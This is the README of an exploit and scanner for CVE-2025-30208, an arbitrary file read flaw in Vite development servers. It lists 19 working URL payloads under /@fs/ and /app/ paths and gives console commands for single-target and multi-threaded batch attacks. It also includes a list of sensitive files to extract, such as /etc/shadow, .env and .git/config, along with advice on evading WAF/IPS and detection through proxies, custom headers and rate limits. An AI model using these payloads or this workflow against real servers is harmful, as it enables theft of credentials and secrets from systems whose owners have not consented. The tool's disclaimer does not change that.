Exploit for CVE-2025-30208

## https://sploitus.com/exploit?id=A75E1BF9-2725-580E-A06B-0892E211AEB1
# 🔥 CVE-2025-30208 Vite Arbitrary File Read Vulnerability Scanner

<div align="center">

![Python](https://img.shields.io/badge/Python-3.7+-blue.svg)
![License](https://img.shields.io/badge/License-Educational-green.svg)
![Security](https://img.shields.io/badge/Security-Pentesting-red.svg)
![Status](https://img.shields.io/badge/Status-Active-brightgreen.svg)

**Advanced vulnerability scanner for CVE-2025-30208 with enterprise-grade features**

*Professional penetration testing tool for Vite Arbitrary File Read vulnerability detection*

[🚀 Quick Start](#-quick-start) • [📋 Features](#-features) • [🔧 Usage](#-usage) • [📊 Examples](#-examples) • [🛡️ Security](#️-security)

</div>

---

## 📖 Overview

This is a comprehensive vulnerability scanner designed to detect and exploit the **CVE-2025-30208** vulnerability in Vite development servers. The vulnerability allows arbitrary file read access through Vite's file system endpoints, potentially exposing sensitive configuration files, source code, and system information.

### 🎯 What This Tool Does

- **Detects** vulnerable Vite instances across networks
- **Exploits** the arbitrary file read vulnerability safely
- **Discovers** sensitive files and configuration data
- **Reports** findings in multiple formats (HTML, JSON, Console)
- **Manages** scanning sessions and configurations
- **Handles** errors gracefully with automatic retry mechanisms

---

## 🚀 Quick Start

### Prerequisites

```bash
pip3 install requests tabulate colorama urllib3
```

### Basic Usage

```bash
python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
```

---

## 📋 Features

### 🔍 Core Vulnerability Detection
- **19 Advanced Payloads**: Multiple exploitation techniques for maximum detection
- **Smart Detection**: Intelligent response analysis to avoid false positives
- **Real-time Validation**: Continuous validation of target responses
- **Comprehensive Testing**: Tests all known vulnerable endpoints

### 🛡️ Enhanced Security Features
- **Proxy Support**: HTTP/HTTPS proxy configuration for anonymity
- **Custom Headers**: Bypass WAF/IPS with custom HTTP headers
- **Rate Limiting**: Configurable delays to avoid detection
- **Session Management**: Save and restore scanning sessions
- **Input Validation**: Comprehensive parameter validation

### 🔧 Advanced Capabilities
- **Batch Scanning**: Multi-threaded scanning of multiple targets
- **Sensitive File Discovery**: Automated discovery of 35+ sensitive files
- **Connectivity Testing**: TCP/UDP/HTTP/HTTPS protocol testing
- **Error Recovery**: Automatic retry with exponential backoff
- **Comprehensive Logging**: Detailed logs with timestamps

### 📊 Reporting & Output
- **HTML Reports**: Beautiful, styled vulnerability reports
- **JSON Export**: Structured data for further analysis
- **Console Output**: Color-coded real-time feedback
- **Log Files**: Detailed audit trails

---

## 🔧 Usage Guide

### 1. Basic Configuration

```bash
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test


CVE-2025-30208 > validate
```

### 2. Vulnerability Testing

```bash

CVE-2025-30208 > run


CVE-2025-30208 > verbose
CVE-2025-30208 > run
```

### 3. Batch Scanning

```bash

CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Press Enter twice to finish]
```

### 4. Sensitive File Discovery

```bash
CVE-2025-30208 > scan
```

### 5. Advanced Configuration

```bash

CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080

CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}

CVE-2025-30208 > rate
Enter rate limit: 1.0
```

---

## 📊 Command Reference

| Command | Description | Example |
|---------|-------------|---------|
| `set <option> <value>` | Set configuration options | `set RHOST 192.168.1.100` |
| `show options` | Display current settings | `show options` |
| `edit` | Interactive option editor | `edit` |
| `run` / `exploit` | Run vulnerability test | `run` |
| `batch` | Batch scan multiple targets | `batch` |
| `scan` | Discover sensitive files | `scan` |
| `pull` | Export results to HTML/JSON | `pull` |
| `save [filename]` | Save session configuration | `save my_session.json` |
| `load [filename]` | Load session configuration | `load my_session.json` |
| `test` | Test connectivity to target | `test` |
| `validate` | Validate current configuration | `validate` |
| `verbose` | Toggle verbose mode | `verbose` |
| `proxy` | Configure proxy settings | `proxy` |
| `headers` | Set custom HTTP headers | `headers` |
| `rate` | Configure rate limiting | `rate` |
| `log` | Show logging information | `log` |
| `help` / `?` | Show help | `help` |
| `exit` / `quit` | Exit tool | `exit` |

---

## ⚙️ Configuration Options

| Option | Description | Default | Validation |
|--------|-------------|---------|------------|
| `RHOST` | Target host/IP address | - | Hostname/IP validation |
| `RPORT` | Target port number | - | Port range (1-65535) |
| `FILEPATH` | File path to test | `etc/passwd` | Path validation |
| `PROXY` | HTTP/HTTPS proxy URL | - | URL format validation |
| `VERBOSE` | Enable verbose output | `false` | Boolean validation |
| `RATE_LIMIT` | Delay between requests (seconds) | `0.3` | Numeric validation |
| `THREADS` | Number of threads for batch scanning | `5` | Integer validation |
| `TIMEOUT` | Request timeout (seconds) | `5` | Integer validation |
| `CUSTOM_HEADERS` | Custom HTTP headers (JSON) | `{}` | JSON format validation |

---

## 🎨 Advanced Payloads

The scanner uses **19 different payload variations** to maximize detection:

### Primary Payloads
```bash
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url
```

### Extended Payloads
```bash
/@fs/{file_path}?raw&inline
/@fs/{file_path}?inline&raw
/@fs/{file_path}?raw&module
/@fs/{file_path}?module&raw
/@fs/{file_path}?raw&vite
/@fs/{file_path}?vite&raw
/@fs/{file_path}?raw&dev
/@fs/{file_path}?dev&raw
```

### Alternative Endpoints
```bash
/app/{file_path}?raw??
/app/{file_path}?raw&url
/app/{file_path}?import&raw??
/App/{file_path}?raw??
/App/{file_path}?raw&url
/App/{file_path}?import&raw??
```

---

## 🔍 Sensitive File Discovery

The tool automatically tests for **35+ common sensitive files**:

### 🖥️ System Files
- `/etc/passwd` - User account information
- `/etc/shadow` - Encrypted password data
- `/etc/services` - Network services
- `/etc/hosts` - Hostname mappings
- `/etc/fstab` - File system table
- `/proc/version` - Kernel version
- `/proc/cpuinfo` - CPU information
- `/proc/meminfo` - Memory information

### ⚙️ Configuration Files
- `.env` - Environment variables
- `package.json` - Node.js dependencies
- `vite.config.js` - Vite configuration
- `vite.config.ts` - TypeScript Vite config
- `tsconfig.json` - TypeScript configuration
- `webpack.config.js` - Webpack configuration
- `next.config.js` - Next.js configuration
- `nuxt.config.js` - Nuxt.js configuration

### 🔧 Development Files
- `.git/config` - Git configuration
- `.gitignore` - Git ignore rules
- `Dockerfile` - Docker configuration
- `docker-compose.yml` - Docker Compose
- `.dockerignore` - Docker ignore rules

### 🌐 Web Server Files
- `nginx.conf` - Nginx configuration
- `apache2.conf` - Apache configuration
- `httpd.conf` - HTTP daemon config
- `.htaccess` - Apache access control
- `robots.txt` - Search engine directives
- `sitemap.xml` - Site structure
- `manifest.json` - Web app manifest
- `sw.js` - Service worker
- `service-worker.js` - Service worker

### 🪟 Windows Files
- `boot.ini` - Boot configuration
- `Users` - User directories
- `Windows` - System files

---

## 🛡️ Error Handling & Recovery

### Automatic Retry Mechanism
- **3 Retry Attempts**: Failed requests are automatically retried
- **Exponential Backoff**: Increasing delays between retries
- **Smart Error Classification**: Different handling for different error types
- **Graceful Recovery**: Tool continues operation after errors

### Error Categories
- **NetworkError**: Connection, timeout, proxy issues
- **ConfigurationError**: Invalid settings and parameters
- **ValidationError**: Invalid input parameters
- **ScannerError**: General scanner errors

### Validation Features
- **Real-time Input Validation**: All parameters validated before use
- **Configuration Validation**: Complete validation before scanning
- **Connectivity Testing**: TCP/UDP/HTTP/HTTPS protocol testing
- **Proxy Validation**: Proxy URL format validation

---

## 📁 Output Files

| File | Description | Format |
|------|-------------|--------|
| `data_leak.html` | Beautiful HTML vulnerability report | HTML |
| `data_leak.json` | Structured JSON export | JSON |
| `sensitive_files_discovery.json` | Discovered sensitive files | JSON |
| `session.json` | Saved session configuration | JSON |
| `logs/cve_2025_30208_YYYYMMDD_HHMMSS.log` | Detailed audit logs | Text |

---

## 📝 Affected Versions

### 🚨 Vulnerable Versions
```
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9
```

### ✅ Unaffected Versions
```
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0
```

---

## 🛡️ Security & Ethical Usage

### ⚠️ Important Security Notes
- **Authorized Testing Only**: Use only on systems you own or have explicit permission to test
- **Responsible Disclosure**: Report vulnerabilities to system owners
- **Rate Limiting**: Use appropriate delays to avoid overwhelming targets
- **Proxy Usage**: Consider using proxies for anonymity when appropriate
- **Legal Compliance**: Ensure compliance with local laws and regulations

### 🔒 Best Practices
- Always obtain written permission before testing
- Use in controlled environments only
- Document all testing activities
- Respect rate limits and system resources
- Report findings responsibly

---

## 🚀 Advanced Usage Examples

### Example 1: Comprehensive Network Scan
```bash

CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch

```

### Example 2: Stealth Scanning with Proxy
```bash

CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run
```

### Example 3: Sensitive File Discovery
```bash

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan

```

---

## 🤝 Contributing

We welcome contributions to improve this tool:

1. **Fork** the repository
2. **Create** a feature branch
3. **Make** your changes
4. **Test** thoroughly
5. **Submit** a pull request

### Contribution Areas
- New payload variations
- Additional sensitive file patterns
- Enhanced error handling
- Improved reporting features
- Performance optimizations
- Documentation improvements

---

## 📄 License

This project is licensed for **educational and authorized security testing purposes only**.

**⚠️ Legal Disclaimer**: This tool is intended for authorized security testing and research purposes only. Users are responsible for ensuring they have proper authorization before testing any systems. The authors are not responsible for any misuse of this tool.

---

## 👨‍💻 Author

<div align="center">

**ThemeHackers**

[![GitHub](https://img.shields.io/badge/GitHub-ThemeHackers-blue?style=for-the-badge&logo=github)](https://github.com/ThemeHackers)

*Security Researcher & Penetration Tester*

</div>

---

<div align="center">

**⭐ If this tool helped you, please give it a star! ⭐**

*Built with ❤️ for the security community*

</div>